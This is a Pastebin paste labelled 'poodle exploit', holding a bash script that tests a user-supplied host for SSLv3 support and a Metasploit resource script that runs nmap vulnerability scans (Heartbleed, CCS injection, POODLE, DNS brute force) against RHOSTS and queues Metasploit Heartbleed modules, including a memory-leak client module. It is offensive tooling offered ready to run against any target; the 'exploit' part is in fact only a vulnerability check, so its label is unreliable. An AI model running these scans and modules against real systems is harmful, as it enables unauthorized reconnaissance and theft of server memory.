Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # poodle exploit
- #!/bin/bash
- # connect to ssl
- timeout_bin=`which timeout 2>/dev/null`
- echo -e "[*] Input Target RHOST - example: 192.44.100.86"
- echo -n "[>]:"
- read _target
- echo ""
- echo -n "[*] $_target:443 - "
- out="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -ssl3 -connect $_target:443 2>/dev/null`"
- if [ $? -eq 124 ]; then
- echo "error: Timeout connecting to host!"
- exit 1
- fi
- if ! echo "$out" | grep -q 'Cipher is' ; then
- echo 'Not vulnerable. Failed to establish SSL connection.'
- exit 0
- fi
- proto=`echo "$out" | grep '^ *Protocol *:' | awk '{ print $3 }'`
- cipher=`echo "$out" | grep '^ *Cipher *:' | awk '{ print $3 }'`
- if [ "$cipher" = '0000' -o "$cipher" = '(NONE)' ]; then
- echo 'Not vulnerable. Failed to establish SSLv3 connection.'
- exit 0
- else
- echo "Vulnerable! SSLv3 connection established using: $proto/$cipher"
- exit 1
- fi
- #--------------------------->
- <ruby>
- print_line("")
- print_good("please Wait, updating [ NSE ] database...")
- run_single("nmap --script-updatedb")
- print_line("")
- print_status("Please wait, checking if RHOSTS is set globally...")
- if (framework.datastore['RHOSTS'] == nil)
- print_error("[ERROR] Please set RHOSTS globally: setg RHOSTS xxx.xxx.xxx.xxx")
- return
- end
- #Using nmap to populate metasploit database
- print_good("RHOSTS set globally [ OK ], running scans...")
- run_single("nmap -n -sS -Pn -oN LiLiP4tH --script ssl-ccs-injection.nse,ssl-heartbleed.nse --script-args vulns.showall -p 443 #{framework.datastore['RHOSTS']}")
- run_single("nmap -T4 -sV -Pn -oN Lt0P4tH --script ssl-poodle.nse,ssl-cert.nse,ssl-enum-ciphers.nse,dns-brute.nse,ip-geolocation-geoplugin.nse -p 443 #{framework.datastore['RHOSTS']}")
- print_line("")
- print_good("Please wait, running msf auxiliary modules...")
- </ruby>
- use auxiliary/scanner/http/ssl_version
- run
- use auxiliary/scanner/http/ssl
- run
- use auxiliary/scanner/ssl/openssl_heartbleed
- run
- use auxiliary/server/openssl_heartbeat_client_memory
- #Running poodle connect exploit
- <ruby>
- print_line("")
- print_good("trying to connect to openssl...")
- run_single("/tmp/poodle.sh")
- </ruby>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement